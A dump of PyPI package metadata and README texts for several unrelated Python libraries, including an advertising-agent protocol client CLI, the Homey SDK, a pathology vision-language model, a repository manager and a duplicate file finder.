See `examples/fetch_agent_authorizations.py` for complete examples.
## CLI Tool
The `adcp` command-line tool provides easy interaction with AdCP agents without writing code.
### Installation
```bash
# Install globally
pip install adcp
# Or use uvx to run without installing
uvx adcp --help
```
### Quick Start
```bash
# Save agent configuration
uvx adcp --save-auth myagent https://agent.example.com mcp
# List tools available on agent
uvx adcp myagent list_tools
# Execute a tool
uvx adcp myagent get_products '{"brief":"TV ads"}'
# Use from stdin
echo '{"brief":"TV ads"}' | uvx adcp myagent get_products
# Use from file
uvx adcp myagent get_products @request.json
# Get JSON output
uvx adcp --json myagent get_products '{"brief":"TV ads"}'
# Enable debug mode
uvx adcp --debug myagent get_products '{"brief":"TV ads"}'
```
### Using Test Agents from CLI
The CLI provides easy access to public test agents without configuration:
```bash
# Use test agent with authentication (MCP)
uvx adcp https://test-agent.adcontextprotocol.org/mcp/ \
--auth 1v8tAhASaUYYp4odoQ1PnMpdqNaMiTrCRqYo9OJp6IQ \
get_products '{"brief":"Coffee brands"}'
# Use test agent WITHOUT authentication (MCP)
uvx adcp https://test-agent.adcontextprotocol.org/mcp/ \
get_products '{"brief":"Coffee brands"}'
# Use test agent with authentication (A2A)
uvx adcp --protocol a2a \
--auth 1v8tAhASaUYYp4odoQ1PnMpdqNaMiTrCRqYo9OJp6IQ \
https://test-agent.adcontextprotocol.org \
get_products '{"brief":"Coffee brands"}'
# Save test agent for easier access
uvx adcp --save-auth test-agent https://test-agent.adcontextprotocol.org/mcp/ mcp
# Enter token when prompted: 1v8tAhASaUYYp4odoQ1PnMpdqNaMiTrCRqYo9OJp6IQ
# Now use saved config
uvx adcp test-agent get_products '{"brief":"Coffee brands"}'
# Use creative agent (no auth required)
uvx adcp https://creative.adcontextprotocol.org/mcp \
preview_creative @creative_manifest.json
```
**Test Agent Details:**
- **URL (MCP)**: `https://test-agent.adcontextprotocol.org/mcp/`
- **URL (A2A)**: `https://test-agent.adcontextprotocol.org`
- **Auth Token**: `1v8tAhASaUYYp4odoQ1PnMpdqNaMiTrCRqYo9OJp6IQ` (optional, public token)
- **Rate Limited**: For testing only, not for production
- **No Auth Mode**: Omit `--auth` flag to test unauthenticated behavior
### Configuration Management
```bash
# Save agent with authentication
uvx adcp --save-auth myagent https://agent.example.com mcp
# Prompts for optional auth token
# List saved agents
uvx adcp --list-agents
# Remove saved agent
uvx adcp --remove-agent myagent
# Show config file location
uvx adcp --show-config
```
### Direct URL Access
```bash
# Use URL directly without saving
uvx adcp https://agent.example.com/mcp list_tools
# Override protocol
uvx adcp --protocol a2a https://agent.example.com list_tools
# Pass auth token
uvx adcp --auth YOUR_TOKEN https://agent.example.com list_tools
```
### Examples
```bash
# Get products from saved agent
uvx adcp myagent get_products '{"brief":"Coffee brands for digital video"}'
# Create media buy
uvx adcp myagent create_media_buy '{
"name": "Q4 Campaign",
"budget": 50000,
"start_date": "2024-01-01",
"end_date": "2024-03-31"
}'
# List creative formats with JSON output
uvx adcp --json myagent list_creative_formats | jq '.data'
# Debug connection issues
uvx adcp --debug myagent list_tools
```
### Configuration File
Agent configurations are stored in `~/.adcp/config.json`:
```json
{
"agents": {
"myagent": {
"agent_uri": "https://agent.example.com",
"protocol": "mcp",
"auth_token": "optional-token"
}
}
}
```
## Environment Configuration
```bash
# .env
WEBHOOK_URL_TEMPLATE="https://myapp.com/webhook/{task_type}/{agent_id}/{operation_id}"
WEBHOOK_SECRET="your-webhook-secret"
ADCP_AGENTS='[
{
"id": "agent_x",
"agent_uri": "https://agent-x.com",
"protocol": "a2a",
"auth_token_env": "AGENT_X_TOKEN"
}
]'
AGENT_X_TOKEN="actual-token-here"
```
```python
# Auto-discover from environment
client = ADCPMultiAgentClient.from_env()
```
## Development
```bash
# Install with dev dependencies
pip install -e ".[dev]"
# Run tests
pytest
# Type checking
mypy src/
# Format code
black src/ tests/
ruff check src/ tests/
```
## Contributing
Contributions welcome! See [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines.
## License
Apache 2.0 License - see [LICENSE](LICENSE) file for details.
## Support
- **API Reference**: [adcontextprotocol.github.io/adcp-client-python](https://adcontextprotocol.github.io/adcp-client-python/)
- **Protocol Documentation**: [docs.adcontextprotocol.org](https://docs.adcontextprotocol.org)
- **Issues**: [GitHub Issues](https://github.com/adcontextprotocol/adcp-client-python/issues)
- **Protocol Spec**: [AdCP Specification](https://github.com/adcontextprotocol/adcp)
| text/markdown | null | AdCP Community <maintainers@adcontextprotocol.org> | null | null | Apache-2.0 | adcp, mcp, a2a, protocol, advertising | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"httpx>=0.24.0",
"pydantic>=2.0.0",
"typing-extensions>=4.5.0",
"a2a-sdk>=0.3.0",
"mcp>=1.23.2",
"email-validator>=2.0.0",
"pytest>=7.0.0; extra == \"dev\"",
"pytest-asyncio>=0.21.0; extra == \"dev\"",
"pytest-cov>=4.0.0; extra == \"dev\"",
"mypy>=1.0.0; extra == \"dev\"",
"black>=23.0.0; extra == \"dev\"",
"ruff>=0.1.0; extra == \"dev\"",
"datamodel-code-generator[http]>=0.35.0; extra == \"dev\"",
"pdoc3>=0.10.0; extra == \"docs\""
] | [] | [] | [] | [
"Homepage, https://github.com/adcontextprotocol/adcp-client-python",
"Documentation, https://docs.adcontextprotocol.org",
"Repository, https://github.com/adcontextprotocol/adcp-client-python",
"Issues, https://github.com/adcontextprotocol/adcp-client-python/issues"
] | twine/6.2.0 CPython/3.10.19 | 2026-02-20T09:28:00.961605 | adcp-3.4.0.tar.gz | 295,159 | e1/47/5e7c9a9b3a6e7ce22bdfaad83d2cf2efdba2e6251109ea08d848d90c3547/adcp-3.4.0.tar.gz | source | sdist | null | false | d6563340e5ee81429a744eabee2e2f87 | 12d055c181e78ed7fa3ebb3f69dcab599bd46af93c42f7a6eefd5a67fc531b4f | e1475e7c9a9b3a6e7ce22bdfaad83d2cf2efdba2e6251109ea08d848d90c3547 | null | [
"LICENSE"
] | 254 |
2.4 | lofar-sid | 1.2.11 | Software interface description | # lofar_sid
This repository contains the following proto definitions:
* hosted by the TANGO-opah-GRPC (StationName:50032)
To use this in your Python project, set the `PIP_EXTRA_INDEX_URL` environment variable, e.g.
`PIP_EXTRA_INDEX_URL=https://git.astron.nl/api/v4/projects/772/packages/pypi/simple`
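A minimal sketch of that setup, assuming `lofar-sid` is the package name you want to install:

```shell
# Point pip at the ASTRON registry as an extra index (in addition to PyPI)
export PIP_EXTRA_INDEX_URL="https://git.astron.nl/api/v4/projects/772/packages/pypi/simple"
echo "pip will also search: $PIP_EXTRA_INDEX_URL"
# then install as usual:
# pip install lofar-sid
```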
| text/markdown | null | null | null | null | Apache License 2.0 | null | [
"Development Status :: 3 - Alpha",
"Environment :: Plugins",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Software Development :: Libraries",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Astronomy",
"Topic :: Scientific/Engineering :: Interface Engine/Protocol Translator"
] | [] | https://git.astron.nl/lofar2.0/sid | null | >=3.10 | [] | [] | [] | [
"numpy",
"grpcio-tools"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.12 | 2026-02-20T09:27:52.745928 | lofar_sid-1.2.11.tar.gz | 43,522 | 3a/31/ed8341cebf348dd833e50feed84ef0949edc92bb4d59f4a0235b17f0ecb5/lofar_sid-1.2.11.tar.gz | source | sdist | null | false | ff6835df08a25b1a9fd9c904594e1ade | c9f58bf92e3d0990e974a9956773cd63485b3ae1bff4e585857533c2597b539e | 3a31ed8341cebf348dd833e50feed84ef0949edc92bb4d59f4a0235b17f0ecb5 | null | [
"LICENSE"
] | 272 |
2.4 | iommi | 7.23.0 | iommi is a high level framework built on django | iommi
=====
.. image:: https://img.shields.io/badge/Code_on-GitHub-black
:target: https://github.com/iommirocks/iommi
.. image:: https://img.shields.io/discord/773470009795018763?logo=discord&logoColor=fff?label=Discord&color=7389d8
:target: https://discord.gg/ZyYRYhf7Pd
.. image:: https://github.com/iommirocks/iommi/workflows/tests/badge.svg
:target: https://github.com/iommirocks/iommi/actions?query=workflow%3Atests+branch%3Amaster
.. image:: https://codecov.io/gh/iommirocks/iommi/branch/master/graph/badge.svg
:target: https://codecov.io/gh/iommirocks/iommi
.. image:: https://readthedocs.org/projects/iommi/badge/?version=latest
:target: https://docs.iommi.rocks
:alt: Documentation Status
.. image:: https://img.shields.io/badge/code%20style-black-000000.svg
:target: https://github.com/psf/black
iommi is a toolkit to build web apps faster. It's built on Django but goes a lot further.
It has:
- `forms <https://docs.iommi.rocks//forms.html>`_: that feel familiar, but can handle growing complexity better than Django's forms
- `tables <https://docs.iommi.rocks//tables.html>`_: that are powerful out of the box and scale up to arbitrary complexity
- a system to `compose parts <https://docs.iommi.rocks//pages.html>`_, like forms, menus, and tables, into bigger pages
- tools that will speed up your development like live edit, jump to code, great feedback for missing select/prefetch related, a profiler, and more.
- great error messages when you make a mistake
.. image:: docs/README-demo.gif
Example:
.. code-block:: python
class IndexPage(Page):
title = html.h1('Supernaut')
welcome_text = 'This is a discography of the best acts in music!'
artists = Table(auto__model=Artist, page_size=5)
albums = Table(
auto__model=Album,
page_size=5,
)
tracks = Table(auto__model=Track, page_size=5)
urlpatterns = [
path('', IndexPage().as_view()),
]
This creates a page with three separate tables, a header and some text:
.. image:: docs/README-screenshot.png
For more examples, see the `examples project <https://github.com/iommirocks/iommi/tree/master/examples/examples>`_.
Getting started
---------------
See `getting started <https://docs.iommi.rocks//getting_started.html>`_.
Running tests
-------------
You need to have tox installed, then:
.. code-block::
make venv
source venv/bin/activate
make test
make test-docs
License
-------
BSD
Documentation
-------------
https://docs.iommi.rocks
| null | Anders Hovmöller | boxed@killingar.net | null | null | BSD | iommi | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Natural Language :: English",
"Programming Language :: Python :: 3"
] | [] | https://github.com/iommirocks/iommi | null | null | [] | [] | [] | [
"Django>=3.2",
"pyparsing"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.6 | 2026-02-20T09:27:47.126816 | iommi-7.23.0.tar.gz | 222,682 | e8/e4/525335cb01501eaace6f44809db9df48661496b88c4dbd9965f028f17ca6/iommi-7.23.0.tar.gz | source | sdist | null | false | ce8ca74d797448dc619a51c66417655e | 391a8797d3e163802ae1da7a6ab4adc3179b70d77487f63fa881abfa4b85029b | e8e4525335cb01501eaace6f44809db9df48661496b88c4dbd9965f028f17ca6 | null | [
"LICENSE",
"AUTHORS.rst"
] | 361 |
2.4 | tickflow | 0.1.3 | TickFlow Python Client | # TickFlow Python SDK
A high-performance market data Python client supporting A-shares, US stocks, and Hong Kong stocks.
## Installation
```bash
pip install tickflow[all]
```
## Quick Start
```python
from tickflow import TickFlow
# Initialize the client
tf = TickFlow(api_key="your-api-key")
# Fetch K-line (candlestick) data
df = tf.klines.get("600000.SH", period="1d", count=100, as_dataframe=True)
print(df.tail())
# Fetch real-time quotes
quotes = tf.quotes.get(symbols=["600000.SH", "AAPL.US"])
for q in quotes:
print(f"{q['symbol']}: {q['last_price']}")
```
## Async Usage
```python
import asyncio
from tickflow import AsyncTickFlow
async def main():
async with AsyncTickFlow(api_key="your-api-key") as tf:
df = await tf.klines.get("600000.SH", as_dataframe=True)
print(df.tail())
asyncio.run(main())
```
## Batch Fetching
```python
# Batch-fetch data for many symbols; requests are automatically chunked and sent concurrently
symbols = tf.exchanges.get_symbols("SH")[:500]
df = tf.klines.batch(
symbols,
period="1d",
as_dataframe=True,
show_progress=True  # show a progress bar
)
```
## Features
- ✅ Synchronous and asynchronous interfaces
- ✅ Native DataFrame support
- ✅ Automatic retries (network and server errors)
- ✅ Automatic sharding of batch requests
- ✅ Progress bar support
- ✅ Complete type annotations
## Documentation
Full documentation: https://docs.tickflow.org
## License
MIT
| text/markdown | TickFlow Team | null | null | null | MIT | finance, stock, market-data, trading, api-client | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Financial and Insurance Industry",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Office/Business :: Financial :: Investment",
"Typing :: Typed"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"httpx>=0.25.0",
"typing-extensions>=4.0.0",
"pandas>=1.5.0; extra == \"pandas\"",
"tqdm>=4.60.0; extra == \"progress\"",
"pandas>=1.5.0; extra == \"all\"",
"tqdm>=4.60.0; extra == \"all\""
] | [] | [] | [] | [
"Documentation, https://docs.tickflow.org"
] | twine/6.2.0 CPython/3.12.4 | 2026-02-20T09:27:05.218213 | tickflow-0.1.3.tar.gz | 20,887 | b0/7a/4cb2630339f5e5cd68504ed992eb15c0b8f1cf3e635b9eebdbb9f0ff88f3/tickflow-0.1.3.tar.gz | source | sdist | null | false | fe6e17e435cce53e5007b02179ba7400 | a97f7a0fddfa46c50f0d0533962ef8344211909d8c6c8e0d1a4362ff40d6f6c6 | b07a4cb2630339f5e5cd68504ed992eb15c0b8f1cf3e635b9eebdbb9f0ff88f3 | null | [] | 240 |
2.4 | antoni-alpha | 0.1.1 | Vision-Language Model for Computational Pathology | # ANTONI-Alpha
Vision-Language Model for Computational Pathology
## Resources
- **Paper:** [OpenReview](https://openreview.net/forum?id=aGPowreqPi) (under review)
- **Model:** [SaltySander/ANTONI-Alpha](https://huggingface.co/SaltySander/ANTONI-Alpha)
- **Dataset:** [SaltySander/HISTAI-Instruct](https://huggingface.co/datasets/SaltySander/HISTAI-Instruct)
- **Data Generation Framework:** [Polysome](https://github.com/computationalpathologygroup/Polysome)
- **Base Model:** [MedGemma-4B-IT](https://huggingface.co/google/medgemma-4b-it)
## Authors
Computational Pathology Group RadboudUMC
## Model Information
ANTONI-Alpha is a vision-language model for computational pathology. It combines Prism vision embeddings (1280-dim) with MedGemma-2B language model through a learned cross-attention projector, enabling natural language interactions with whole slide images.
**Architecture:**
- Vision encoder: Prism (produces tile-level embeddings)
- Language model: MedGemma-2B (4-bit quantized with LoRA)
- Projector: Cross-attention with 256 learnable query tokens
**Training:**
- Stage 1: Projector alignment (frozen LLM)
- Stage 2: Instruction tuning (LoRA fine-tuning)
- Dataset: HISTAI-Instruct (multilingual, multimodal)
## Installation
**From PyPI** (recommended for running the model):
```bash
pip install antoni-alpha
```
**From source** (for development or training):
```bash
git clone https://github.com/computationalpathologygroup/ANTONI-Alpha.git
cd ANTONI-Alpha
pip install -e .
```
### Optional: Flash Attention 2
For improved performance on compatible hardware, install Flash Attention 2:
```bash
pip install flash-attn==2.8.3 --no-build-isolation
```
The `--no-build-isolation` flag allows the build process to use your installed PyTorch. Flash Attention 2 requires CUDA-capable hardware and will be used automatically if installed.
## How to Use
```python
import torch
from pathlib import Path
from antoni_alpha.models.antoni_pretrained import AntoniAlphaPreTrained
# Load model
model = AntoniAlphaPreTrained.from_pretrained(
"SaltySander/ANTONI-Alpha",
device_map="auto",
torch_dtype=torch.bfloat16
)
# Load slide features (Prism embeddings: [num_tiles, 1280])
slide_features = torch.load("slide_features.pt")
slide_latents = slide_features.unsqueeze(0) # Add batch dimension
slide_latents = slide_latents.to(next(model.projection_layer.parameters()).device)
# Run inference
conversation = [{"role": "user", "content": "What tissue is this?"}]
with torch.no_grad():
output_ids = model.generate(
slide_latents=slide_latents,
conversations=[conversation],
max_new_tokens=200,
do_sample=False,
)
response = model.processor.batch_decode(output_ids, skip_special_tokens=True)[0]
print(response)
```
See `examples/inference_example.py` for a complete multi-turn conversation example.
## Input/Output Structure
**Input:**
- `slide_latents`: Tensor of shape `[batch_size, num_tiles, 1280]` (Prism embeddings)
- `conversations`: List of conversation lists in OpenAI format
**Output:**
- Generated text response from the language model
## Training
```bash
# Configure training
python train.py --config config/finetune.yaml
```
Training configurations available in `config/` directory.
## License
This model is released under the [Health AI Developer Foundations License](https://developers.google.com/health-ai-developer-foundations/terms).
## Citation
```bibtex
@inproceedings{moonemans2025open,
title={Democratizing Pathology Co-Pilots: An Open Pipeline and Dataset for Whole-Slide Vision-Language Modeling},
author={Sander Moonemans and Sebastiaan Ram and Fr{\'e}d{\'e}rique Meeuwsen and Carlijn Lems and Jeroen van der Laak and Geert Litjens and Francesco Ciompi},
booktitle={Submitted to Medical Imaging with Deep Learning},
year={2025},
url={https://openreview.net/forum?id=aGPowreqPi},
note={under review}
}
```
| text/markdown | null | Sander Moonemans <sander.moonemans@radboudumc.nl> | null | null | null | deep learning, vision-language models, computational pathology, transformers | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Operating System :: OS Independent"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"torch>=2.0.0",
"transformers>=4.56.2",
"einops>=0.8.0",
"environs>=11.0.0",
"sacremoses>=0.1.1",
"accelerate>=0.21.0",
"peft>=0.6.0",
"numpy>=1.21.0",
"h5py>=3.7.0",
"python-dotenv>=1.0.0",
"bitsandbytes>=0.47.0",
"sentence-transformers>=2.7.0",
"pillow>=12.0.0",
"pytest>=7.0.0; extra == \"dev\"",
"black>=23.0.0; extra == \"dev\"",
"isort>=5.12.0; extra == \"dev\"",
"flake8>=6.0.0; extra == \"dev\"",
"mypy>=1.5.0; extra == \"dev\"",
"pre-commit>=3.0.0; extra == \"dev\"",
"debugpy; extra == \"dev\"",
"flash-attn>=2.8.0; extra == \"training\"",
"wandb>=0.15.0; extra == \"training\"",
"tensorboard>=2.13.0; extra == \"training\""
] | [] | [] | [] | [
"Homepage, https://github.com/computationalpathologygroup/ANTONI-Alpha",
"Repository, https://github.com/computationalpathologygroup/ANTONI-Alpha",
"Documentation, https://github.com/computationalpathologygroup/ANTONI-Alpha#readme",
"Issues, https://github.com/computationalpathologygroup/ANTONI-Alpha/issues"
] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T09:26:14.485339 | antoni_alpha-0.1.1.tar.gz | 34,571 | 78/96/afcc9e8e3810d645547a07ff5f5515a5ec02f2ec93cf8beb5348ef853f40/antoni_alpha-0.1.1.tar.gz | source | sdist | null | false | b2516063827b2234be695c1904cf4db5 | 061e7d61934955cfff3c55ecf9c0437c2c1cd7f89bee6f6168d4752c65889aa1 | 7896afcc9e8e3810d645547a07ff5f5515a5ec02f2ec93cf8beb5348ef853f40 | MIT | [
"LICENSE"
] | 228 |
2.4 | smart-repository-manager-core | 0.3.2 | Smart Repository Manager Core - A Python library for managing Git repositories with intelligent synchronization, SSH configuration validation, and GitHub integration. | # Smart Repository Manager Core <sup>v0.3.2</sup>
---
A Python library for managing Git repositories with intelligent synchronization, SSH configuration validation, and GitHub integration.
---
[](https://pypi.org/project/smart-repository-manager-core/)
[](https://github.com/smartlegionlab/smart-repository-manager-core/)

[](https://pypi.org/project/smart-repository-manager-core)
[](https://github.com/smartlegionlab/smart-repository-manager-core/blob/master/LICENSE)
[](https://pypi.org/project/smart-repository-manager-core)
[](https://github.com/smartlegionlab/smart-repository-manager-core/stargazers)
[](https://github.com/smartlegionlab/smart-repository-manager-core/network/members)
---
## Features
- **Repository Management**: Clone, pull, parallel download and sync GitHub repositories with intelligent health checks
- **SSH Configuration**: Automatic SSH key validation and configuration for GitHub
- **User Management**: Multiple user profiles with GitHub token authentication
- **Network Diagnostics**: Comprehensive connectivity checks and network validation
- **Smart Synchronization**: Intelligent sync with auto-repair for broken repositories
- **Configuration Persistence**: User settings and repository state storage
## Installation
```bash
pip install smart-repository-manager-core
```
## Core Services
### Repository Management
- Clone repositories via SSH
- Pull updates with health verification
- Automatic repair of broken repositories
- Repository health diagnostics
- Create repositories archive
- Downloading repositories
### SSH Management
- SSH key validation and permissions checking
- Automatic GitHub SSH configuration
- SSH connection testing
- Key generation and management
### GitHub Integration
- Token authentication and validation
- Repository listing and metadata
- Rate limit monitoring
- User profile management
### Network Services
- Connectivity checks for GitHub and Git services
- DNS resolution testing
- Network diagnostics
### Configuration
- User profile management
- Application settings persistence
- Multi-user support
- Token storage
## Requirements
- Python 3.6+
- Git installed and available in PATH
- SSH client (for SSH operations)
## License
BSD 3-Clause License - See [LICENSE](LICENSE) file for details.
## Related Projects
This core library powers two complete implementations:
### [CLI Version](https://github.com/smartlegionlab/smart-repository-manager-cli)
A full-featured command-line interface built on top of this core library. Provides terminal-based repository management with all features accessible via commands.
### [GUI Version](https://github.com/smartlegionlab/smart-repository-manager-gui)
A desktop graphical user interface that offers visual management of repositories, SSH configuration, and synchronization tasks. Built for users who prefer point-and-click interaction.
Both implementations use this core library as their engine, ensuring consistent behavior and feature parity across interfaces.
---
## Disclaimer
**Important**: This software is provided "as-is" without any warranties or guarantees. The developers are not responsible for:
- Data loss or corruption
- Repository damage or unintended modifications
- Security breaches or token exposure
- Network issues or connectivity problems
- Any other direct or indirect damages
**Use at your own risk**. Always maintain backups of your repositories and tokens. This project is in active development and may contain bugs or incomplete features.
## Development Status
⚠️ **Active Development** - This project is under active development. Features may change, and stability is not guaranteed. Not recommended for production use without thorough testing.
## Contributing
Currently not accepting contributions as the project is in early development phase.
## Support
For issues and questions, please check the GitHub repository:
[https://github.com/smartlegionlab/smart-repository-manager-core](https://github.com/smartlegionlab/smart-repository-manager-core)
---
**Developer**: [Alexander Suvorov]( https://github.com/smartlegionlab/)
**Contact**: [smartlegiondev@gmail.com](mailto:smartlegiondev@gmail.com)
| text/markdown | null | Alexander Suvorov <smartlegiondev@gmail.com> | null | null | null | null | [
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Operating System :: OS Independent"
] | [] | null | null | >=3.6 | [] | [] | [] | [
"requests==2.32.5"
] | [] | [] | [] | [
"Homepage, https://github.com/smartlegionlab/smart-repository-manager-core"
] | twine/6.2.0 CPython/3.14.2 | 2026-02-20T09:25:39.254173 | smart_repository_manager_core-0.3.2.tar.gz | 31,606 | 63/55/dd61b6145f2c57d5a84b70b66e26444eabbd22fad58e85b547f4a9c7f2b7/smart_repository_manager_core-0.3.2.tar.gz | source | sdist | null | false | f2994e8ccf9a42f1c88caf9a4dda69c8 | 9e529184754ab7526c806f3c1bb4db8b41fd2a820b1be80ba7e1e63e22cb6c31 | 6355dd61b6145f2c57d5a84b70b66e26444eabbd22fad58e85b547f4a9c7f2b7 | BSD-3-Clause | [
"LICENSE"
] | 225 |
2.4 | homey-stubs | 0.0.5.0 | Type annotations for the Homey SDK | # homey-stubs
Type annotations for the Homey SDK
### Static type-checkers
These types have been tested with:
- [Pyright](https://github.com/microsoft/pyright) version 1.1.406
A static type-checking package is not required, however; even without one, these stubs will still improve autocomplete suggestions
and error detection in your IDE.
### Example
The following example illustrates some situations that will be caught by pyright.
```python
from homey.driver import Driver
from homey.flow_card_trigger_device import FlowCardTriggerDevice
class MyDriver(Driver):
async def on_init(self) -> None:
# Type "FlowCardTrigger" is not assignable to declared type "FlowCardTriggerDevice"
trigger_card: FlowCardTriggerDevice = self.homey.flow.get_trigger_card("something_happens")
some_token = await self.homey.flow.create_token("some_token", "number", "Some token")
# Type "Literal['value']" is not assignable to type "float | None"
await some_token.set_value("value")
```
| text/markdown | Athom B.V. | null | null | null | null | homey, homey-stubs, smart home, smarthome, typing, stubs, mypy, pyright | [
"Intended Audience :: Developers",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.13",
"Typing :: Stubs Only",
"Natural Language :: English",
"Operating System :: OS Independent"
] | [] | null | null | >=3.13 | [] | [] | [] | [] | [] | [] | [] | [
"homepage, https://homey.app/",
"documentation, https://apps.developer.homey.app/"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:25:23.662924 | homey_stubs-0.0.5.0-py3-none-any.whl | 52,546 | b7/fb/c5e703837394d9fae3d90c2e9360ae3f7d98eb23b35a18877e0cb2239237/homey_stubs-0.0.5.0-py3-none-any.whl | py3 | bdist_wheel | null | false | e89a0a07228e1b5160b0416a432d6d41 | 4cf85768cd3b9e99a2c8092c1e82b144665cec6a859c698ab481529987e9e2b2 | b7fbc5e703837394d9fae3d90c2e9360ae3f7d98eb23b35a18877e0cb2239237 | ISC | [] | 98 |
2.4 | homey-apps-sdk-v3 | 0.0.5 | The Homey SDK | # homey-apps-sdk-v3
This is an alias for [homey](https://pypi.org/project/homey/)
# homey
The Python [Homey Apps SDK](https://apps.developer.homey.app/).
When apps are run this package will be supplied for you,
so you do not need to explicitly make it a dependency of your app.
### Static Typing
Typing information for this library is available separately in [homey-stubs](https://pypi.org/project/homey-stubs/)
| text/markdown | null | null | null | null | null | null | [
"Intended Audience :: Developers",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.13"
] | [] | null | null | >=3.13 | [] | [] | [] | [
"homey==0.0.5"
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:25:14.490473 | homey_apps_sdk_v3-0.0.5-py3-none-any.whl | 1,402 | dd/73/cbc075b38b1df5e7bd377a7e1e6dc980afaf22a6a9fe43dc00838c7658cc/homey_apps_sdk_v3-0.0.5-py3-none-any.whl | py3 | bdist_wheel | null | false | ec6d983438c26d277f0b7a77994c138b | 12e7837d8f9ba58e4b8f38e35948bd06ccd46993c1b689fe559b3e47dbf1afe1 | dd73cbc075b38b1df5e7bd377a7e1e6dc980afaf22a6a9fe43dc00838c7658cc | ISC | [] | 92 |
2.4 | homey | 0.0.5 | The Homey SDK | # homey
The Python [Homey Apps SDK](https://apps.developer.homey.app/).
When apps are run this package will be supplied for you,
so you do not need to explicitly make it a dependency of your app.
### Static Typing
Typing information for this library is available separately in [homey-stubs](https://pypi.org/project/homey-stubs/)
| text/markdown | null | null | null | null | null | null | [
"Intended Audience :: Developers",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.13"
] | [] | null | null | >=3.13 | [] | [] | [] | [] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:25:13.223620 | homey-0.0.5-py3-none-any.whl | 105,351 | c1/8a/da5cd41a8a5add11d3b9409d435c7977c873fe47cc6efb097a0b17e5c128/homey-0.0.5-py3-none-any.whl | py3 | bdist_wheel | null | false | 51ba8104ae0db46f8d86dd773ac2e970 | e7d9f24774aeaf88351794b48cf4b00a1d24699f0e257e6043c753cc8be6969a | c18ada5cd41a8a5add11d3b9409d435c7977c873fe47cc6efb097a0b17e5c128 | ISC | [] | 109 |
2.4 | onlyone | 2.4.7 | Fast duplicate file finder with optional GUI |
# [OnlyOne](https://github.com/initumX/onlyone)

A PyQt-based tool for finding and removing duplicate files with advanced filtering and progress tracking.
*Note: the GUI is an optional extra (not installed by default). To install the app with the GUI, use:
`pip install onlyone[gui]`
## How to install and run
1. Create a Python virtual environment and enter it: `python3 -m venv ~/onlyone && cd ~/onlyone`
2. Activate it: `source ~/onlyone/bin/activate`
3. Install onlyone into it: `pip install onlyone[gui]`
4. Run the app: `onlyone-gui` or `onlyone`(for cli)
Binaries for Linux and Windows are available in the [GitHub releases](https://github.com/initumX/onlyone/releases)
### Features
* Filtering by file size and extension
* Sorting inside duplicate groups
* Supporting various deduplication modes
* Preview images/pdf directly in the interface
* Context menu(open/delete/reveal in explorer)
* Progress tracking (in gui-version)
* One click deletion (delete all duplicates at once)
* Priority and excluded directories functionality
* Statistics/report
### How does it work?
1. Recursively scans folder using filters (min/max size, extension)
2. Applies one of the initial grouping ways from "boosting" option (size, size+extension, etc)
3. Further checking depends on mode:
* "fast": checks the hash sum of the first 128+ KB (false positives are quite possible)
* "normal": checks the hash sums of 3 parts of the file: front -> middle -> end (generally reliable)
* "full": checks the hash sums of front -> middle -> entire file (very slow for large files)
4. Shows the list of groups sorted in descending order (groups with larger files come first).
**Files inside a group are sorted by path/filename length (you can regulate this).
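The size-then-partial-hash idea in steps 1–3 can be sketched as follows. This is illustrative only, not the app's actual code: the app uses `xxhash`, while this self-contained sketch uses the standard library's `hashlib`.

```python
import hashlib
from collections import defaultdict
from pathlib import Path

def partial_digest(path, chunk=128 * 1024):
    """Hash only the first `chunk` bytes -- the "fast" mode idea."""
    h = hashlib.blake2b()
    with open(path, "rb") as f:
        h.update(f.read(chunk))
    return h.hexdigest()

def group_by_size_then_hash(paths):
    """Stage 1: group by size; stage 2: confirm candidates with a partial hash."""
    by_size = defaultdict(list)
    for p in paths:
        by_size[Path(p).stat().st_size].append(p)
    groups = []
    for same_size in by_size.values():
        if len(same_size) < 2:
            continue  # a unique size cannot have duplicates
        by_hash = defaultdict(list)
        for p in same_size:
            by_hash[partial_digest(p)].append(p)
        groups.extend(g for g in by_hash.values() if len(g) > 1)
    return groups
```

The "normal" and "full" modes extend the same scheme by hashing additional regions (or the whole file) only for candidates that still collide.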
### Deleting all duplicates at once
